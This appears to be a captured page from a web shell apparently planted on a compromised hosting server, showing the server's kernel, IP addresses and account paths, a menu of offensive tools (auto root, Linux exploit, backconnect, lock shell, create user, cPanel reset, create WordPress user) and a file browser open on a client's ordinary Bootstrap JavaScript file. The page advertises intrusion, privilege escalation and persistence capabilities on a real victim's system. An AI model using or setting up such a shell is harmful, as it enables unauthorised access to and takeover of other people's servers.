Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.149.249.84
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
milovo /
files /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.js
948
B
-rw-r--r--
helpers.js
24.28
KB
-rw-r--r--
menu.js
17.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.js
import * as bootstrap from 'bootstrap' // Extend Tooltip to add color options bootstrap.Tooltip.prototype.show = (original => { return function addTooltipColor() { if (this._config.toggle === 'tooltip') { if (this._element.getAttribute('data-color')) { const str = `tooltip-${this._element.getAttribute('data-color')}` this.getTipElement().classList.add(str) } } original.apply(this) } })(bootstrap.Tooltip.prototype.show) // Extend Popover to add color options bootstrap.Popover.prototype.show = (original => { return function addPopoverColor() { if (this._config.toggle === 'popover') { if (this._element.getAttribute('data-color')) { const str = `popover-${this._element.getAttribute('data-color')}` this.getTipElement().classList.add(str) } } original.apply(this) } })(bootstrap.Popover.prototype.show) export { bootstrap }
Close